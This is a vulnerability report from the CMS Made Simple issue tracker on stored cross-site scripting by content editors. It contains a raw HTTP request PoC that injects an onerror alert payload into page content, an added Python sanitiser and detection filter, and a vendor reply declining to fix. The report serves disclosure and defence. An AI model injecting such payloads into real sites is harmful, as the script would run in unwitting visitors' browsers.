CMS MADE SIMPLE FORGE

CMS Made Simple Core


[#12392] Stored Cross-Site Scripting - CMS Made Simple 2.2.15

Created By: Vu Tien Hoa (hoavt)
Date Submitted: Fri Dec 04 02:36:46 -0500 2020

Assigned To:
Version: 2.1.5
CMSMS Version: 2.1.5
Severity: Minor
Resolution: Won't Fix
State: Open
Summary:
Stored Cross-Site Scripting - CMS Made Simple 2.2.15
Detailed Description:
# Description
A user who has permission to edit content (Editor or Designer) can embed JavaScript in the content. When any user accesses the page, the JavaScript code will execute.

# PoC
## Step 1: Go to Content Manager and edit content
## Step 2: Modify content_en with payload "<img src = x onerror = alert(origin)>" and submit
POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: web-lab.pwn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web-lab.pwn/
Content-Type: multipart/form-data; boundary=---------------------------72093799622205927352514468929
Content-Length: 4525
Origin: http://web-lab.pwn
Connection: close
Cookie: e65594eeb39b9b448034fc3eee48fc815463b91a=9b293e574967f5dc78abea9174d5f4caf5159e14%3A%3AeyJ1aWQiOjMsInVzZXJuYW1lIjoiZWRpdG9yIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJExFM1NKTHF5bDR3emh2cHNcLzgxTVIuVUk4bU9tcEZNekJwUkU4dzc5Z1NlS3c0UGtqbExycSJ9; __c=1a2e1c5b9a471aa9e58; fusionl9731_visited=yes; CMSSESSIDac0680acaa0f=al5kq5mhtivpdjlchcutj7g1eo
Upgrade-Insecure-Requests: 1

-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="mact"

CMSContentManager,m1_,admin_editcontent,0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="__c"

1a2e1c5b9a471aa9e58
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_content_id"

35
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_active_tab"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_content_type"

content
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="title"

Demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="content_en"

<p>demo<img src="x" onerror=alert(origin) /></p>
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="menutext"

Demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="parent_id"

-1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="showinmenu"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="showinmenu"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="titleattribute"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="accesskey"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="tabindex"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="target"

---
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="metadata"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="pagedata"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="design_id"

2
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="template_id"

10
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="alias"

demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="active"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="active"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="secure"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="cachable"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="cachable"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="image"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="thumbnail"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra1"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra2"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra3"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="wantschildren"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="wantschildren"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="searchable"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="searchable"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="disable_wysiwyg"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="ownerid"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="additional_editors"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_submit"

Submit
-----------------------------72093799622205927352514468929--

## Step 3: Go to the page and trigger it
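For a site that wants to treat editor-submitted content as untrusted despite the vendor position below, the following is an added example of a server-side check on the `content_en` value; it is not code from the report or from CMS Made Simple. It uses Python's standard `html.parser` to strip event-handler attributes, `javascript:` URLs and script-bearing elements from the fragment and to report what it removed, so the same pass can feed a log-based detection. The tag and attribute sets are assumptions for illustration, and `SAMPLE_CONTENT` is the constructed `content_en` value from the PoC above.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample: the content_en value submitted in the PoC request above.
SAMPLE_CONTENT = '<p>demo<img src="x" onerror=alert(origin) /></p>'

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)        # onerror, onload, onclick, ...
SCRIPT_TAGS = {"script", "iframe", "object", "embed"}  # dropped with their contents
URL_ATTRS = {"src", "href", "action"}                  # checked for javascript: URLs
VOID_TAGS = {"img", "br", "hr", "input", "link", "meta"}  # never get a closing tag


class ActiveContentFilter(HTMLParser):
    """Drops script-bearing tags/attributes and records what was dropped."""
    def __init__(self):
        super().__init__()          # convert_charrefs=True: text arrives decoded
        self.out, self.findings, self._skip = [], [], 0

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:   # a value-less attribute arrives as None
            if EVENT_ATTR.match(name) or (name in URL_ATTRS and
                    (value or "").strip().lower().startswith("javascript:")):
                self.findings.append(f"{tag}@{name}")   # e.g. img@onerror
            else:
                kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):      # also called for <img ... />
        if tag in SCRIPT_TAGS:
            self.findings.append(f"<{tag}>")
            self._skip += 1                     # suppress everything until </tag>
        elif not self._skip:
            self.out.append(f"<{tag}{self._clean_attrs(tag, attrs)}>")

    def handle_endtag(self, tag):
        if tag in SCRIPT_TAGS:
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))   # re-encode text


def filter_content(fragment):
    """Return (sanitized_html, findings) for a submitted content_en value."""
    f = ActiveContentFilter()
    f.feed(fragment)
    f.close()
    return "".join(f.out), f.findings
```

A non-empty `findings` list on save is the signal worth logging per user and content id; the rebuilt fragment is what would be stored instead of the raw submission.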


History

Comments
Date: 2020-12-04 10:34
Posted By: Matt Hornsby (DIGI3) (DIGI3)

The admin section is for trusted users only. If you need a login system for
untrusted users, there are third-party modules available.

Please read
https://www.cmsmadesimple.org/community/get-involved/report-a-vulnerability for
more clarification on our position.
Updates

Updated: 2020-12-04 10:35
resolution_id: => 8